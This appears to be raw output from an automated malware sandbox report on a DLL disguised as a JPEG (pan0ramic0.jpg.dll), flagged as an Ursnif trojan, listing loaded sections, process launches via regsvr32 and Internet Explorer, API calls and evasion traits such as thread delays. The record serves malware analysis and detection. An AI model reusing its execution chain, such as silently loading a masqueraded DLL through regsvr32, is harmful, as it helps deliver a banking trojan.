            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 5 .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 4 .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 3 .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 2 .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 1 .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 0 .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: - .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: , .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: + .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: * .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ) .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ( .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ' .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: & .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: % .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: $ .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: # .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ' .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ! .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ~ .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: } .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: | .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: { .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: z .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: y .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: x .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: w .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: v .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: u .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: t .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: s .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: r .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: q .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: p .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: o .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: n .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: m .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: l .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: k .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: j .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: i .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: h .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: g .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: f .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: e .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: d .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: c .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: b .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: a .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ` .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: _ .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ^ .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ] .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: [ .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: z .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: y .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: x .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: w .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: v .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: u .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: t .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: s .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: r .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: q .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: p .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: o .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: n .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: m .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: l .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: k .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: j .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: i .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: h .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: g .dllJump to behavior
            Source: pan0ramic0.jpg.dllStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            Source: classification engineClassification label: mal64.troj.winDLL@13/120@10/2
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_04F6244A CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,1_2_04F6244A
            Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{F528558E-5CDD-11EB-90E5-ECF4BB570DC9}.datJump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\~DF67008EB6CF702BD1.TMPJump to behavior
            Source: pan0ramic0.jpg.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files\internet explorer\iexplore.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\pan0ramic0.jpg.dll'
            Source: unknownProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\pan0ramic0.jpg.dll
            Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'
            Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6444 CREDAT:17410 /prefetch:2
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6444 CREDAT:82962 /prefetch:2
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6444 CREDAT:82966 /prefetch:2
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\pan0ramic0.jpg.dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exeJump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6444 CREDAT:17410 /prefetch:2Jump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6444 CREDAT:82962 /prefetch:2Jump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6444 CREDAT:82966 /prefetch:2Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: pan0ramic0.jpg.dllStatic PE information: More than 257 > 100 exports found
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dllJump to behavior
            Source: pan0ramic0.jpg.dllStatic PE information: real checksum: 0x42055 should be: 0x3b7fd
            Source: unknownProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\pan0ramic0.jpg.dll
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_00402060 push ecx; ret 1_2_00402069
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_004020B3 push ecx; ret 1_2_004020C3
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_04F6ACD0 push ecx; ret 1_2_04F6ACD9
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_04F6B08B push ecx; ret 1_2_04F6B09B
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_04E103AC push dword ptr [esp+0Ch]; ret 1_2_04E103BF
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_04E103AC push dword ptr [esp+10h]; ret 1_2_04E10404
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_04E1009C push dword ptr [ebp-000000D8h]; ret 1_2_04E10252
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_04E1009C push dword ptr [ebp-000000E0h]; ret 1_2_04E1029C
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_04E1009C push dword ptr [esp+10h]; ret 1_2_04E103AB
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_04E10066 push dword ptr [ebp-000000D8h]; ret 1_2_04E1009B
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_04E10005 push dword ptr [ebp-000000D8h]; ret 1_2_04E10065

            Hooking and other Techniques for Hiding and Protection:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000001.00000003.298876856.0000000005928000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.298930970.0000000005928000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.298914793.0000000005928000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.628060995.0000000005928000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.298824563.0000000005928000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.298690231.0000000005928000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.298657792.0000000005928000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.298734803.0000000005928000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.298607542.0000000005928000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 6396, type: MEMORY
            Source: C:\Windows\SysWOW64\regsvr32.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exe TID: 6768Thread sleep count: 266 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exe TID: 6768Thread sleep time: -133000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\regsvr32.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_04F6523C RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,1_2_04F6523C
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_04E103AC mov eax, dword ptr fs:[00000030h]1_2_04E103AC
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_04E1009C mov eax, dword ptr fs:[00000030h]1_2_04E1009C
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_04E10476 mov eax, dword ptr fs:[00000030h]1_2_04E10476
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exeJump to behavior
            Source: regsvr32.exe, 00000001.00000002.625603426.0000000003420000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
            Source: regsvr32.exe, 00000001.00000002.625603426.0000000003420000.00000002.00000001.sdmpBinary or memory string: Progman
            Source: regsvr32.exe, 00000001.00000002.625603426.0000000003420000.00000002.00000001.sdmpBinary or memory string: SProgram Managerl
            Source: regsvr32.exe, 00000001.00000002.625603426.0000000003420000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd,
            Source: regsvr32.exe, 00000001.00000002.625603426.0000000003420000.00000002.00000001.sdmpBinary or memory string: Progmanlock
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_04F65DC6 cpuid 1_2_04F65DC6
            Source: C:\Windows\SysWOW64\regsvr32.exeQueries volume information: unknown VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeQueries volume information: unknown VolumeInformationJump to behavior
